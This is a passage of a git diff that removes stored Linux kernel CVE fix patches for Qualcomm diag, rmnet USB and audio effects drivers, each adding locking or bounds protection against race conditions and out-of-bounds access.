- FL("scanId %d domainIdCurrent %d scanType %s (%d) bssType %s (%d) requestType %s (%d) numChannels %d"),
-@@ -5652,6 +5673,7 @@ QDF_STATUS csr_scan_copy_request(tpAniSirGlobal mac_ctx,
- dst_req->pIEField = NULL;
- dst_req->ChannelInfo.ChannelList = NULL;
- dst_req->SSIDs.SSIDList = NULL;
-+ dst_req->voui = NULL;
-
- if (src_req->uIEFieldLen) {
- dst_req->pIEField =
-@@ -5809,6 +5831,29 @@ QDF_STATUS csr_scan_copy_request(tpAniSirGlobal mac_ctx,
- dst_req->scan_id = src_req->scan_id;
- dst_req->timestamp = src_req->timestamp;
-
-+ if (src_req->num_vendor_oui == 0) {
-+ dst_req->num_vendor_oui = 0;
-+ dst_req->voui = NULL;
-+ } else {
-+ dst_req->voui = qdf_mem_malloc(src_req->num_vendor_oui *
-+ sizeof(*dst_req->voui));
-+ if (!dst_req->voui)
-+ status = QDF_STATUS_E_NOMEM;
-+ else
-+ status = QDF_STATUS_SUCCESS;
-+
-+ if (QDF_IS_STATUS_SUCCESS(status)) {
-+ dst_req->num_vendor_oui = src_req->num_vendor_oui;
-+ qdf_mem_copy(dst_req->voui,
-+ src_req->voui,
-+ src_req->num_vendor_oui *
-+ sizeof(*dst_req->voui));
-+ } else {
-+ dst_req->num_vendor_oui = 0;
-+ sms_log(mac_ctx, LOGE, FL("No memory for voui"));
-+ }
-+ }
-+
- complete:
- if (!QDF_IS_STATUS_SUCCESS(status)) {
- csr_scan_free_request(mac_ctx, dst_req);
-@@ -5836,6 +5881,12 @@ QDF_STATUS csr_scan_free_request(tpAniSirGlobal pMac, tCsrScanRequest *pReq)
- }
- pReq->SSIDs.numOfSSIDs = 0;
-
-+ if (pReq->voui) {
-+ qdf_mem_free(pReq->voui);
-+ pReq->voui = NULL;
-+ }
-+ pReq->num_vendor_oui = 0;
-+
- return QDF_STATUS_SUCCESS;
- }
-
-diff --git a/core/wma/src/wma_scan_roam.c b/core/wma/src/wma_scan_roam.c
-index d2dceca..8a78323 100644
---- a/core/wma/src/wma_scan_roam.c
-+++ b/core/wma/src/wma_scan_roam.c
-@@ -283,6 +283,17 @@ QDF_STATUS wma_get_buf_start_scan_cmd(tp_wma_handle wma_handle,
- qdf_mem_copy(cmd->mac_addr_mask, scan_req->mac_addr_mask,
- QDF_MAC_ADDR_SIZE);
-
-+ /* probe req ie whitelisting attributes */
-+ cmd->ie_whitelist = scan_req->ie_whitelist;
-+ if
(cmd->ie_whitelist) {
-+ for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+ cmd->probe_req_ie_bitmap[i] =
-+ scan_req->probe_req_ie_bitmap[i];
-+ cmd->num_vendor_oui = scan_req->num_vendor_oui;
-+ cmd->oui_field_len = scan_req->oui_field_len;
-+ cmd->voui = (uint8_t *)scan_req + scan_req->oui_field_offset;
-+ }
-+
- if (!scan_req->p2pScanType) {
- WMA_LOGD("Normal Scan request");
- cmd->scan_ctrl_flags |= WMI_SCAN_ADD_CCK_RATES;
-@@ -3174,6 +3185,18 @@ QDF_STATUS wma_pno_start(tp_wma_handle wma, tpSirPNOScanReq pno)
- params->band_rssi_pref.band = pno->band_rssi_pref.band;
- params->band_rssi_pref.rssi = pno->band_rssi_pref.rssi;
-
-+ /* probe req ie whitelisting attributes */
-+ params->ie_whitelist = pno->ie_whitelist;
-+ if (params->ie_whitelist) {
-+ for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+ params->probe_req_ie_bitmap[i] =
-+ pno->probe_req_ie_bitmap[i];
-+ params->num_vendor_oui = pno->num_vendor_oui;
-+ params->oui_field_len = pno->num_vendor_oui *
-+ sizeof(struct vendor_oui);
-+ params->voui = (uint8_t *)pno;
-+ }
-+
- status = wmi_unified_pno_start_cmd(wma->wmi_handle,
- params, channel_list);
- if (QDF_IS_STATUS_SUCCESS(status)) {
-@@ -5599,6 +5622,7 @@ QDF_STATUS wma_reset_passpoint_network_list(tp_wma_handle wma,
- QDF_STATUS wma_scan_probe_setoui(tp_wma_handle wma, tSirScanMacOui *psetoui)
- {
- struct scan_mac_oui set_oui;
-+ uint32_t i = 0;
-
- qdf_mem_set(&set_oui, sizeof(struct scan_mac_oui), 0);
-
-@@ -5614,6 +5638,18 @@ QDF_STATUS wma_scan_probe_setoui(tp_wma_handle wma, tSirScanMacOui *psetoui)
- set_oui.enb_probe_req_sno_randomization =
- psetoui->enb_probe_req_sno_randomization;
-
-+ /* probe req ie whitelisting attributes */
-+ set_oui.ie_whitelist = psetoui->ie_whitelist;
-+ if (set_oui.ie_whitelist) {
-+ for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++)
-+ set_oui.probe_req_ie_bitmap[i] =
-+ psetoui->probe_req_ie_bitmap[i];
-+ set_oui.num_vendor_oui = psetoui->num_vendor_oui;
-+ set_oui.oui_field_len = psetoui->num_vendor_oui *
-+ sizeof(struct
vendor_oui);
-+ set_oui.voui = (uint8_t *)psetoui;
-+ }
-+
- return wmi_unified_scan_probe_setoui_cmd(wma->wmi_handle,
- &set_oui);
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11023/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11023/3.18/0001.patch
deleted file mode 100644
index dea3e339..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11023/3.18/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 17ef83c708be034454df7914ef5484c36515eece Mon Sep 17 00:00:00 2001
-From: Jonathan Solnit
-Date: Fri, 1 Sep 2017 15:19:29 -0700
-Subject: [PATCH] diag: Add protection while processing non-hdlc packets
-
-Currently, there is possibility of out-of-bound accesses during
-handling of data in non-hdlc path. The patch adds proper protection
-when processing non-hdlc packet information to fix the issue.
-
-Bug: 64434485
-CRs-Fixed: 2029216
-Change-Id: I07c466f85bd8ac08226948fea86b1d8567e68431
-Signed-off-by: Hardik Arya
-Signed-off-by: Mishra Mahima
-Signed-off-by: Jonathan Solnit
----
- drivers/char/diag/diagchar.h | 1 +
- drivers/char/diag/diagchar_core.c | 1 +
- drivers/char/diag/diagfwd.c | 44 ++++++++++++++++++++++++++++++---------
- 3 files changed, 36 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index de3e160762e9f..c1749d3435732 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -537,6 +537,7 @@ struct diagchar_dev {
- unsigned char *buf_feature_mask_update;
- uint8_t hdlc_disabled;
- struct mutex hdlc_disable_mutex;
-+ struct mutex hdlc_recovery_mutex;
- struct timer_list hdlc_reset_timer;
- struct mutex diag_hdlc_mutex;
- unsigned char *hdlc_buf;
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 590f53c36e511..048e1fd60b805 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -3392,6 +3392,7 @@ static int __init diagchar_init(void)
- mutex_init(&apps_data_mutex);
- mutex_init(&driver->msg_mask_lock);
- mutex_init(&driver->diagfwd_channel_mutex);
-+ mutex_init(&driver->hdlc_recovery_mutex);
- init_waitqueue_head(&driver->wait_q);
- INIT_WORK(&(driver->diag_drain_work), diag_drain_work_fn);
- INIT_WORK(&(driver->update_user_clients),
-diff --git a/drivers/char/diag/diagfwd.c b/drivers/char/diag/diagfwd.c
-index 65bbe7cdd8347..60d126acae99a 100644
----
a/drivers/char/diag/diagfwd.c
-+++ b/drivers/char/diag/diagfwd.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1348,7 +1348,9 @@ static void diag_hdlc_start_recovery(unsigned char *buf, int len,
-
- if (start_ptr) {
- /* Discard any partial packet reads */
-+ mutex_lock(&driver->hdlc_recovery_mutex);
- driver->incoming_pkt.processing = 0;
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_process_non_hdlc_pkt(start_ptr, len - i, info);
- }
- }
-@@ -1362,18 +1364,24 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- const uint32_t header_len = sizeof(struct diag_pkt_frame_t);
- struct diag_pkt_frame_t *actual_pkt = NULL;
- unsigned char *data_ptr = NULL;
-- struct diag_partial_pkt_t *partial_pkt = &driver->incoming_pkt;
-+ struct diag_partial_pkt_t *partial_pkt = NULL;
-
-- if (!buf || len <= 0)
-+ mutex_lock(&driver->hdlc_recovery_mutex);
-+ if (!buf || len <= 0) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- return;
--
-- if (!partial_pkt->processing)
-+ }
-+ partial_pkt = &driver->incoming_pkt;
-+ if (!partial_pkt->processing) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto start;
-+ }
-
- if (partial_pkt->remaining > len) {
- if ((partial_pkt->read_len + len) > partial_pkt->capacity) {
- pr_err("diag: Invalid length %d, %d received in %s\n",
- partial_pkt->read_len, len, __func__);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
- }
- memcpy(partial_pkt->data + partial_pkt->read_len, buf, len);
-@@ -1387,6 +1395,7 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- pr_err("diag: Invalid length during partial read %d, %d received in %s\n",
- partial_pkt->read_len,
- partial_pkt->remaining, __func__);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
- }
- memcpy(partial_pkt->data + partial_pkt->read_len, buf,
-@@ -1400,20 +1409,27 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- if (partial_pkt->remaining == 0) {
- actual_pkt = (struct diag_pkt_frame_t *)(partial_pkt->data);
- data_ptr = partial_pkt->data + header_len;
-- if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+ if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+ CONTROL_CHAR) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_hdlc_start_recovery(buf, len, info);
-+ mutex_lock(&driver->hdlc_recovery_mutex);
-+ }
- err = diag_process_apps_pkt(data_ptr,
- actual_pkt->length, info);
- if (err) {
- pr_err("diag: In %s, unable to process incoming data packet, err: %d\n",
- __func__, err);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
- }
- partial_pkt->read_len = 0;
- partial_pkt->total_len = 0;
- partial_pkt->processing = 0;
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto start;
- }
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
-
- start:
-@@ -1426,14 +1442,14 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- diag_send_error_rsp(buf, len);
- goto end;
- }
--
-+ mutex_lock(&driver->hdlc_recovery_mutex);
- if (pkt_len + header_len > partial_pkt->capacity) {
- pr_err("diag: In %s, incoming data is too large for the request buffer %d\n",
- __func__, pkt_len);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_hdlc_start_recovery(buf, len, info);
- break;
- }
--
- if ((pkt_len + header_len) > (len - read_bytes)) {
- partial_pkt->read_len = len - read_bytes;
- partial_pkt->total_len = pkt_len + header_len;
-@@ -1441,19 +1457,27 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- partial_pkt->read_len;
- partial_pkt->processing = 1;
- memcpy(partial_pkt->data, buf, partial_pkt->read_len);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- break;
- }
- data_ptr = buf + header_len;
--
if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+ if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+ CONTROL_CHAR) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_hdlc_start_recovery(buf, len, info);
-+ mutex_lock(&driver->hdlc_recovery_mutex);
-+ }
- else
- hdlc_reset = 0;
- err = diag_process_apps_pkt(data_ptr,
- actual_pkt->length, info);
-- if (err)
-+ if (err) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- break;
-+ }
- read_bytes += header_len + pkt_len + 1;
- buf += header_len + pkt_len + 1; /* advance to next pkt */
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- }
- end:
- return;
diff --git a/Patches/Linux_CVEs/CVE-2017-11023/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-11023/4.4/0002.patch
deleted file mode 100644
index b910235f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11023/4.4/0002.patch
+++ /dev/null
@@ -1,172 +0,0 @@
-From c36e61af0f770125d0061a8d988d0987cc8d116a Mon Sep 17 00:00:00 2001
-From: Hardik Arya
-Date: Thu, 15 Jun 2017 10:39:34 +0530
-Subject: diag: Add protection while processing non-hdlc packets
-
-Currently, there is possibility of out-of-bound accesses during
-handling of data in non-hdlc path. The patch adds proper protection
-when processing non-hdlc packet information to fix the issue.
-
-CRs-Fixed: 2029216
-Change-Id: I07c466f85bd8ac08226948fea86b1d8567e68431
-Signed-off-by: Hardik Arya
----
- drivers/char/diag/diagchar.h | 1 +
- drivers/char/diag/diagchar_core.c | 1 +
- drivers/char/diag/diagfwd.c | 42 ++++++++++++++++++++++++++++++---------
- 3 files changed, 35 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index 92cf24d..cc56d68 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -578,6 +578,7 @@ struct diagchar_dev {
- unsigned char *buf_feature_mask_update;
- uint8_t hdlc_disabled;
- struct mutex hdlc_disable_mutex;
-+ struct mutex hdlc_recovery_mutex;
- struct timer_list hdlc_reset_timer;
- struct mutex diag_hdlc_mutex;
- unsigned char *hdlc_buf;
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index d8fcfe2..54f638a 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -3621,6 +3621,7 @@ static int __init diagchar_init(void)
- mutex_init(&driver->delayed_rsp_mutex);
- mutex_init(&apps_data_mutex);
- mutex_init(&driver->msg_mask_lock);
-+ mutex_init(&driver->hdlc_recovery_mutex);
- for (i = 0; i < NUM_PERIPHERALS; i++)
- mutex_init(&driver->diagfwd_channel_mutex[i]);
- init_waitqueue_head(&driver->wait_q);
-diff --git a/drivers/char/diag/diagfwd.c b/drivers/char/diag/diagfwd.c
-index 019bf19..7dc2eab 100644
---- a/drivers/char/diag/diagfwd.c
-+++ b/drivers/char/diag/diagfwd.c
-@@ -1405,7 +1405,9 @@ static void diag_hdlc_start_recovery(unsigned char *buf, int len,
-
- if
(start_ptr) {
- /* Discard any partial packet reads */
-+ mutex_lock(&driver->hdlc_recovery_mutex);
- driver->incoming_pkt.processing = 0;
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_process_non_hdlc_pkt(start_ptr, len - i, info);
- }
- }
-@@ -1419,18 +1421,24 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- const uint32_t header_len = sizeof(struct diag_pkt_frame_t);
- struct diag_pkt_frame_t *actual_pkt = NULL;
- unsigned char *data_ptr = NULL;
-- struct diag_partial_pkt_t *partial_pkt = &driver->incoming_pkt;
-+ struct diag_partial_pkt_t *partial_pkt = NULL;
-
-- if (!buf || len <= 0)
-+ mutex_lock(&driver->hdlc_recovery_mutex);
-+ if (!buf || len <= 0) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- return;
--
-- if (!partial_pkt->processing)
-+ }
-+ partial_pkt = &driver->incoming_pkt;
-+ if (!partial_pkt->processing) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto start;
-+ }
-
- if (partial_pkt->remaining > len) {
- if ((partial_pkt->read_len + len) > partial_pkt->capacity) {
- pr_err("diag: Invalid length %d, %d received in %s\n",
- partial_pkt->read_len, len, __func__);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
- }
- memcpy(partial_pkt->data + partial_pkt->read_len, buf, len);
-@@ -1444,6 +1452,7 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- pr_err("diag: Invalid length during partial read %d, %d received in %s\n",
- partial_pkt->read_len,
- partial_pkt->remaining, __func__);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
- }
- memcpy(partial_pkt->data + partial_pkt->read_len, buf,
-@@ -1457,20 +1466,27 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- if (partial_pkt->remaining == 0) {
- actual_pkt = (struct diag_pkt_frame_t *)(partial_pkt->data);
- data_ptr = partial_pkt->data + header_len;
-- if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+ if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+ CONTROL_CHAR) {
-+
mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_hdlc_start_recovery(buf, len, info);
-+ mutex_lock(&driver->hdlc_recovery_mutex);
-+ }
- err = diag_process_apps_pkt(data_ptr,
- actual_pkt->length, info);
- if (err) {
- pr_err("diag: In %s, unable to process incoming data packet, err: %d\n",
- __func__, err);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
- }
- partial_pkt->read_len = 0;
- partial_pkt->total_len = 0;
- partial_pkt->processing = 0;
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto start;
- }
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- goto end;
-
- start:
-@@ -1483,14 +1499,14 @@ start:
- diag_send_error_rsp(buf, len, info);
- goto end;
- }
--
-+ mutex_lock(&driver->hdlc_recovery_mutex);
- if (pkt_len + header_len > partial_pkt->capacity) {
- pr_err("diag: In %s, incoming data is too large for the request buffer %d\n",
- __func__, pkt_len);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_hdlc_start_recovery(buf, len, info);
- break;
- }
--
- if ((pkt_len + header_len) > (len - read_bytes)) {
- partial_pkt->read_len = len - read_bytes;
- partial_pkt->total_len = pkt_len + header_len;
-@@ -1498,19 +1514,27 @@ start:
- partial_pkt->read_len;
- partial_pkt->processing = 1;
- memcpy(partial_pkt->data, buf, partial_pkt->read_len);
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- break;
- }
- data_ptr = buf + header_len;
-- if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+ if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+ CONTROL_CHAR) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- diag_hdlc_start_recovery(buf, len, info);
-+ mutex_lock(&driver->hdlc_recovery_mutex);
-+ }
- else
- hdlc_reset = 0;
- err = diag_process_apps_pkt(data_ptr,
- actual_pkt->length, info);
-- if (err)
-+ if (err) {
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- break;
-+ }
- read_bytes += header_len + pkt_len + 1;
- buf += header_len + pkt_len + 1; /* advance to next pkt */
-+ mutex_unlock(&driver->hdlc_recovery_mutex);
- }
-
end:
- return;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11024/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11024/ANY/0001.patch
deleted file mode 100644
index 984003aa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11024/ANY/0001.patch
+++ /dev/null
@@ -1,115 +0,0 @@
-From f2a482422fefadfa0fa9b4146fc0e2b46ac04922 Mon Sep 17 00:00:00 2001
-From: Liangliang Lu
-Date: Fri, 5 May 2017 08:50:32 +0800
-Subject: net: usb: rmnet_usb_ctrl:Make sure list_head operate atomically
-
-Get and delete operation on variables "list_elem" are not atomic.
-Multiple threads may get the same "list_elem", may lead to race
-conditions.
-
-Add mutex in rmnet_ctl_open to resolve current potential race condition
-between test_bit and set_bit.
-
-Change-Id: I00c4e2fd4854ee17a13a0757da98c46a78eee4cb
-Signed-off-by: Liangliang Lu
----
- drivers/net/usb/rmnet_usb_ctrl.c | 32 +++++++++++++++++++++++---------
- 1 file changed, 23 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/net/usb/rmnet_usb_ctrl.c b/drivers/net/usb/rmnet_usb_ctrl.c
-index 58fd1f6..75e9783 100644
---- a/drivers/net/usb/rmnet_usb_ctrl.c
-+++ b/drivers/net/usb/rmnet_usb_ctrl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2014, 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -514,8 +514,13 @@ static int rmnet_ctl_open(struct inode *inode, struct file *file)
- if (!dev)
- return -ENODEV;
-
-- if (test_bit(RMNET_CTRL_DEV_OPEN, &dev->status))
-+ mutex_lock(&dev->dev_lock);
-+ if (test_bit(RMNET_CTRL_DEV_OPEN, &dev->status)) {
-+ mutex_unlock(&dev->dev_lock);
- goto already_opened;
-+ }
-+ set_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+ mutex_unlock(&dev->dev_lock);
-
- if (dev->mdm_wait_timeout &&
- !test_bit(RMNET_CTRL_DEV_READY, &dev->cudev->status)) {
-@@ -527,10 +532,15 @@ static int rmnet_ctl_open(struct inode *inode, struct file *file)
- if (retval == 0) {
- dev_err(dev->devicep, "%s: Timeout opening %s\n",
- __func__, dev->name);
-- return -ETIMEDOUT;
-- } else if (retval < 0) {
-+ retval = -ETIMEDOUT;
-+ } else if (retval < 0)
- dev_err(dev->devicep, "%s: Error waiting for %s\n",
- __func__, dev->name);
-+
-+ if (retval < 0) {
-+ mutex_lock(&dev->dev_lock);
-+ clear_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+ mutex_unlock(&dev->dev_lock);
- return retval;
- }
- }
-@@ -538,14 +548,15 @@ static int rmnet_ctl_open(struct inode *inode, struct file *file)
- if (!test_bit(RMNET_CTRL_DEV_READY, &dev->cudev->status)) {
- dev_dbg(dev->devicep, "%s: Connection timedout opening %s\n",
- __func__, dev->name);
-+ mutex_lock(&dev->dev_lock);
-+ clear_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+ mutex_unlock(&dev->dev_lock);
- return -ETIMEDOUT;
- }
-
- /* clear stale data if device close called but channel was ready */
- rmnet_usb_ctrl_free_rx_list(dev);
-
-- set_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
--
- file->private_data = dev;
-
- already_opened:
-@@ -564,7 +575,9 @@ static int rmnet_ctl_release(struct inode *inode, struct file *file)
-
- DBG("%s Called on %s device\n", __func__, dev->name);
-
-+ mutex_lock(&dev->dev_lock);
- clear_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+ mutex_unlock(&dev->dev_lock);
-
- file->private_data = NULL;
-
-@@ -638,6 +651,7 @@ ctrl_read:
-
- list_elem = list_first_entry(&dev->rx_list,
- struct ctrl_pkt_list_elem, list);
-+ list_del(&list_elem->list);
- bytes_to_read = (uint32_t)(list_elem->cpkt.data_size);
- if (bytes_to_read > count) {
- spin_unlock_irqrestore(&dev->rx_lock, flags);
-@@ -654,11 +668,11 @@ ctrl_read:
- dev_err(dev->devicep,
- "%s: copy_to_user failed for %s\n",
- __func__, dev->name);
-+ spin_lock_irqsave(&dev->rx_lock, flags);
-+ list_add(&list_elem->list, &dev->rx_list);
-+ spin_unlock_irqrestore(&dev->rx_lock, flags);
- return -EFAULT;
- }
-- spin_lock_irqsave(&dev->rx_lock, flags);
-- list_del(&list_elem->list);
-- spin_unlock_irqrestore(&dev->rx_lock, flags);
-
- kfree(list_elem->cpkt.data);
- kfree(list_elem);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11025/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11025/ANY/0001.patch
deleted file mode 100644
index 1969cbbf..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11025/ANY/0001.patch
+++ /dev/null
@@ -1,248 +0,0 @@
-From 95e72ae9281b77abc3ed0cc6a33c17b989241efa Mon Sep 17 00:00:00 2001
-From: kunleiz
-Date: Sun, 26 Mar 2017 20:07:43 +0800
-Subject: ASoC: msm: qdspv2: add mutex to prevent access same memory
- simultaneously
-
-Add mutex protection to avoid simultaneous access the
-same memory by multiple threads.
-
-CRs-Fixed: 2013494
-Change-Id: I440ea633ceb7312637c9a3b29d22236166d21a39
-Signed-off-by: kunleiz
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 34 +++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 089a827..e7c28a6 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -148,6 +148,8 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- case AUDIO_START: {
- pr_debug("%s: AUDIO_START\n", __func__);
-
-+ mutex_lock(&effects->lock);
-+
- rc = q6asm_open_read_write_v2(effects->ac,
- FORMAT_LINEAR_PCM,
- FORMAT_MULTI_CHANNEL_LINEAR_PCM,
-@@ -159,6 +161,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- pr_err("%s: Open failed for hw accelerated effects:rc=%d\n",
- __func__, rc);
- rc = -EINVAL;
-+ mutex_unlock(&effects->lock);
- goto ioctl_fail;
- }
- effects->opened = 1;
-@@ -175,6 +178,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- pr_err("%s: Write buffer Allocation failed rc = %d\n",
- __func__, rc);
- rc = -ENOMEM;
-+ mutex_unlock(&effects->lock);
- goto ioctl_fail;
- }
- atomic_set(&effects->in_count, effects->config.input.num_buf);
-@@ -185,6 +189,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- pr_err("%s: Read buffer Allocation failed rc = %d\n",
- __func__, rc);
- rc = -ENOMEM;
-+ mutex_unlock(&effects->lock);
- goto readbuf_fail;
- }
- atomic_set(&effects->out_count, effects->config.output.num_buf);
-@@ -199,6 +204,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- if (rc < 0) {
- pr_err("%s: pcm read block config failed\n", __func__);
- rc = -EINVAL;
-+ mutex_unlock(&effects->lock);
- goto cfg_fail;
- }
- pr_debug("%s: dec: sample_rate: %d, num_channels: %d, bit_width: %d\n",
-@@ -213,6 +219,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- pr_err("%s: pcm write format block config failed\n",
- __func__);
- rc = -EINVAL;
-+ mutex_unlock(&effects->lock);
- goto cfg_fail;
- }
-
-@@ -225,6 +232,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- effects->started = 0;
- pr_err("%s: ASM run state failed\n", __func__);
- }
-+ mutex_unlock(&effects->lock);
- break;
- }
- case AUDIO_EFFECTS_WRITE: {
-@@ -286,8 +294,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- uint32_t idx = 0;
- uint32_t size = 0;
-
-+ mutex_lock(&effects->lock);
-+
- if (!effects->started) {
- rc = -EFAULT;
-+ mutex_unlock(&effects->lock);
- goto ioctl_fail;
- }
-
-@@ -304,11 +315,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- if (!rc) {
- pr_err("%s: read wait_event_timeout\n", __func__);
- rc = -EFAULT;
-+ mutex_unlock(&effects->lock);
- goto ioctl_fail;
- }
- if (!atomic_read(&effects->in_count)) {
- pr_err("%s: pcm stopped in_count 0\n", __func__);
- rc = -EFAULT;
-+ mutex_unlock(&effects->lock);
- goto ioctl_fail;
- }
-
-@@ -316,15 +329,18 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- if (bufptr) {
- if (!((void *)arg)) {
- rc = -EFAULT;
-+ mutex_unlock(&effects->lock);
- goto ioctl_fail;
- }
- if ((effects->config.buf_cfg.input_len > size) ||
- copy_to_user((void *)arg, bufptr,
- effects->config.buf_cfg.input_len)) {
- rc = -EFAULT;
-+ mutex_unlock(&effects->lock);
- goto ioctl_fail;
- }
- }
-+ mutex_unlock(&effects->lock);
- break;
- }
- default:
-@@ -456,6 +472,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- switch (cmd) {
- case AUDIO_SET_EFFECTS_CONFIG: {
- pr_debug("%s: AUDIO_SET_EFFECTS_CONFIG\n", __func__);
-+ mutex_lock(&effects->lock);
- memset(&effects->config, 0, sizeof(effects->config));
- if (copy_from_user(&effects->config, (void *)arg,
- sizeof(effects->config))) {
-@@ -473,6 +490,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- effects->config.input.num_buf,
- effects->config.input.sample_rate,
- effects->config.input.num_channels);
-+ mutex_unlock(&effects->lock);
- break;
- }
- case AUDIO_EFFECTS_SET_BUF_LEN: {
-@@ -494,6 +512,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
-
- buf_avail.input_num_avail = atomic_read(&effects->in_count);
- buf_avail.output_num_avail = atomic_read(&effects->out_count);
-+ mutex_lock(&effects->lock);
- pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
- __func__, buf_avail.output_num_avail,
- buf_avail.input_num_avail);
-@@ -503,16 +522,20 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- __func__);
- rc = -EFAULT;
- }
-+ mutex_unlock(&effects->lock);
- break;
- }
